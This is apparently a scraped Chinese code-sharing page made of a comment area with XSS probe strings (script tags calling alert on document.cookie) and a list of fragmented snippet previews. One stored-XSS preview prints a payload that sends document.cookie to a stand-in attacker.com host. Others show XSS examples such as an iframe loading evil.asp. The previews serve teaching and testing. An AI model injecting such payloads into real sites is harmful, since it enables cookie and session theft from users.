`

</script><script>alert(document.cookie)</script>

 
阅读更多
</script><script>alert(1)</script>
sdfasdfasdf
分享到:
评论

相关推荐

    js使用小技巧

    禁止选取&lt;body oncontextmenu="return false" ondragstart="return false" onselectstart ="return false" onselect="document.selection.empty()" oncopy="document.selection.empty()" onbeforecopy="return false...

    wayos认证页面

    4"class="hide"src="http://www.82340777.com/public/theme/images/auth_4.png"width="723"height="338"alt=""/&gt;&lt;/div&gt;&lt;div class="sidebox"&gt;&lt;ul&gt;&lt;li class="nav1 this"rel="0"&gt;&lt;/li&gt;&lt;li class="nav2"rel="1"&gt;&lt;/li&gt;...

    计算机病毒与防护:JavaScript基础.ppt

    &lt;script src="1.js"&gt;&lt;/script&gt; ``` 在`1.js`文件中,可以编写更复杂的JavaScript逻辑,提高代码的可维护性和模块化。 在计算机病毒防护方面,JavaScript也可以发挥作用。虽然病毒主要通过恶意代码传播,但开发者...

    新浪推荐浮动广告

    topmargin="0" rightmargin="0" bottommargin="0"&gt;&lt;br&gt;&lt;table height=1000&gt;&lt;br&gt;&lt;tr&gt;&lt;td&gt;dddd&lt;/td&gt;&lt;/tr&gt;&lt;br&gt;&lt;/table&gt;&lt;br&gt;&lt;/body&gt;&lt;br&gt;&lt;/html&gt;&lt;br&gt;&lt;br&gt;&lt;script&gt;&lt;br&gt;&lt;!--[346,1,680] published at 2006-12-26 13:38:23 ...

    XSS跨站攻击

    - `&lt;script&gt;alert(document.cookie)&lt;/script&gt;`:显示用户Cookie。 - `&lt;iframe src="http://www.example.com"&gt;&lt;/iframe&gt;`:在当前页面中嵌入另一个站点。 #### 七、XSS分类 1. **反射式XSS**:攻击脚本包含在请求的...

    PHP程序中的特效应用 实用珍藏代码举例

    if (document.cookie.length &gt; 0) { offset = document.cookie.indexOf(search); if (offset != -1) { offset += search.length; end = document.cookie.indexOf(";", offset); if (end == -1) { end = ...

    JavaScript 基础.txt

    &lt;script type="text/javascript" src="script.js"&gt;&lt;/script&gt; &lt;/body&gt; &lt;/html&gt; ``` 3. **位置考虑:**脚本的位置不同会影响其执行时机。一般而言,将脚本放在`&lt;head&gt;`标签内会在文档加载完毕后执行;而放在`...

    Javascript珍藏实用代码

    if (document.cookie.length &gt; 0) { offset = document.cookie.indexOf(search); if (offset != -1) { offset += search.length; end = document.cookie.indexOf(";", offset); if (end == -1) { end = ...

    XML轻松学习手册--XML肯定是未来的发展趋势,不论是网页设计师还是网络程序员,都应该及时学习和了解

    看上面的"结构树",其中&lt;myfile&gt;是父元素,&lt;title&gt;,&lt;author&gt;是它的子元素,而&lt;myfile&gt;又是&lt;filelist&gt;的子元素。象&lt;title&gt;这样没有包含任何子元素的最后一级元素我们也称之为"页元素"。 4.Parser(解析软件) Parser...

    一个用户登录界面html

    &lt;script src="scripts.js"&gt;&lt;/script&gt; &lt;/body&gt; &lt;/html&gt; ``` 在这个例子中,`&lt;form&gt;`元素定义了登录表单,`&lt;input&gt;`元素用于获取用户输入,`&lt;label&gt;`元素与输入框关联,提供了更好的可读性。`&lt;button&gt;`用于提交表单...

    ASP.NET常用代码

    &lt;script language="javascript" for="document" event="onkeydown"&gt; if(event.keyCode==13 && event.srcElement.type!='button' && event.srcElement.type!='submit' && event.srcElement.type!='reset' && event....

    客户登录界面

    &lt;script src="login.js"&gt;&lt;/script&gt; &lt;/body&gt; &lt;/html&gt; ``` 接下来,我们使用JavaScript和jQuery进行表单验证。在`login.js`文件中,我们可以监听表单的提交事件,检查输入是否有效,例如: ```javascript $...

    ASP.NET内置对象

    - 页面跳转并弹出对话框:`Response.Write("&lt;script&gt;alert('确定');location='index.aspx'&lt;/script&gt;")` - 打开新窗口:`Response.Write("&lt;script&gt;window.open('index.aspx')&lt;/script&gt;")` - 关闭当前窗口:`Response....

    .net中前台javascript与后台c#函数相互调用问题.pdf

    &lt;script&gt; function callCSharpFunction() { document.getElementById("btn1").click(); } &lt;/script&gt; ``` 这样,当JavaScript函数被调用时,实际上会触发后台的C#方法。 **方法二:**使用HTML嵌入C#表达式 在HTML中...

    网页设计试题

    &lt;script type="text/javascript"&gt; function generateTable() { var table = document.createElement('table'); for (var i = 1; i &lt;= 9; i++) { var row = table.insertRow(i - 1); for (var j = 1; j &lt;= 9; j++...

    存储XSS1

    示例:`&lt;script&gt;new Image().src="http://attacker.com/c.php?output="+document.cookie;&lt;/script&gt;` 这段代码会将用户的Cookie值发送到攻击者的服务器。 2. **钓鱼攻击**:攻击者可以创建伪造的页面,诱导用户点击...

    图库新版jQuery焦点图 JS代码

    document.write('&lt;script type="text/javascript" &gt;BAIDU_CLB_SLOT_ID = "288992";&lt;/script&gt;'); document.write(ojs);} if (code=="top210x90_2"){ document.write('&lt;script type="text/javascript" &gt;BAIDU_CLB_SLOT...

    web安全技术-实验七、跨站脚本攻击(xss)(反射型).doc

    3. `&lt;script&gt;alert(document.cookie)&lt;/script&gt;`:直接在HTML中插入JavaScript,尝试获取并弹出用户的cookie。 4. `&lt;iframe src="http://host/evil.asp"&gt;&lt;/iframe&gt;`:创建一个iframe,尝试加载恶意页面,可能会实现...

    集成Email登录

    &lt;script src="email_login.js"&gt;&lt;/script&gt; &lt;/body&gt; &lt;/html&gt; ``` 在这个HTML文件中,我们定义了一个简单的登录表单,包含一个电子邮件输入字段和一个密码输入字段,以及一个提交按钮。`email_login.js`是我们的...

    asp连接数据库代码实例

    if request("keyword")&lt;&gt;"" and request("select")&lt;&gt;"" then sql="select * from biao where "&request("select")&" like '%"&request("keyword")&"%'" elseif request("keyword")&lt;&gt;"" and request("select")="all...

Global site tag (gtag.js) - Google Analytics